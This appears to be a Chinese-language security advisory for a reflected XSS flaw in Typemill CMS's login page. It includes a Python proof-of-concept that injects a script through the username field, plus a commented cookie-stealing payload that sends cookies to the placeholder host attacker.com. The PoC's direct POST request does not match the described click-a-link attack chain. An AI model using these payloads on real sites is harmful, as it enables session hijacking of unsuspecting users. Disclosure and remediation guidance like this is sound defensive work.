CVE-2026-24127 Typemill CMS 登录页面反射型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-24127

漏洞类型

XSS（跨站脚本攻击）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Typemill CMS

漏洞概述

CVE-2026-24127是Typemill CMS中存在的反射型跨站脚本（Reflected XSS）漏洞。Typemill是一个基于平面文件的Markdown内容管理系统，专为信息文档网站设计。该漏洞存在于登录错误视图模板login.twig中，当用户认证失败时，系统会将username参数的值直接回显到页面而未进行适当的上下文编码。攻击者可以通过精心构造的恶意Payload注入到username参数中，诱使受害者在登录页面执行任意JavaScript脚本，从而窃取用户会话Cookie、劫持用户账户或进行其他恶意操作。由于该漏洞位于登录页面，攻击者可以轻松通过钓鱼邮件或社交工程手段诱导目标用户访问恶意链接。此漏洞已在版本2.19.2中得到修复。

技术细节

该漏洞的根本原因在于Typemill CMS的login.twig模板在处理登录错误时，直接将用户提交的username参数值回显到HTML页面中，而没有进行任何输出编码或上下文转义。当认证失败时，系统会将username值传递给视图模板，模板引擎直接将此值嵌入到HTML响应中。攻击者可以在username参数中注入恶意JavaScript代码，如：<script>alert(document.cookie)</script>。当受害者访问包含此恶意Payload的登录页面时，浏览器会将其解析为可执行脚本并执行。由于登录页面通常不涉及敏感操作，用户可能会降低警惕性，但攻击者仍可通过XSS获取用户的认证会话，实现账户劫持。修复措施包括在模板中对username值使用HTML实体编码函数，确保特殊字符被正确转义，防止脚本注入执行。

攻击链分析

STEP 1

步骤1

攻击者构造包含恶意XSS Payload的登录请求，将Payload注入到username参数中

STEP 2

步骤2

攻击者将恶意链接通过钓鱼邮件、社交媒体或其他渠道发送给目标用户

STEP 3

步骤3

目标用户点击链接访问登录页面，触发认证失败（需要提供任意错误凭据）

STEP 4

步骤4

服务器将未经过滤的username值回显到login.twig模板的HTML响应中

STEP 5

步骤5

用户浏览器解析HTML响应时，将恶意Payload作为JavaScript执行

STEP 6

步骤6

攻击者通过JavaScript窃取用户Cookie、会话令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2026-24127 PoC - Typemill CMS Reflected XSS
# Target: Typemill CMS login page
# Vulnerability: Unsanitized username parameter in login.twig template

def exploit_xss(target_url, payload):
    """
    Exploit the reflected XSS vulnerability in Typemill CMS login page.
    
    Args:
        target_url: Base URL of the Typemill CMS installation
        payload: Malicious JavaScript payload to inject
    
    Returns:
        Response from the server
    """
    # Login endpoint
    login_url = f"{target_url}/login"
    
    # Prepare malicious username with XSS payload
    data = {
        'authcode': 'test',  # Invalid authcode to trigger error
        'username': payload,  # XSS payload injected here
        'password': 'test'
    }
    
    # Send request with malicious username
    response = requests.post(login_url, data=data, allow_redirects=False)
    
    return response

# Example usage
if __name__ == "__main__":
    target = "http://vulnerable-server.com"
    
    # Basic XSS payload to steal cookies
    xss_payload = "<script>alert(document.cookie)</script>"
    
    # More advanced payload for cookie stealing
    # xss_payload = "<img src=x onerror='fetch(\"https://attacker.com/log?c=\"+document.cookie)'/>"
    
    print(f"[*] Targeting: {target}")
    print(f"[*] Payload: {xss_payload}")
    
    response = exploit_xss(target, xss_payload)
    
    print(f"[*] Response Status: {response.status_code}")
    print(f"[*] XSS payload sent. Victim will execute script on page visit.")

影响范围

Typemill CMS <= 2.19.1

防御指南

临时缓解措施

如果无法立即升级，可临时在Web服务器层面配置，输入过滤规则拒绝包含<script>标签或JavaScript事件处理器的请求。同时建议在生产环境中启用HttpOnly和Secure标志的Cookie，防止JavaScript访问敏感会话数据。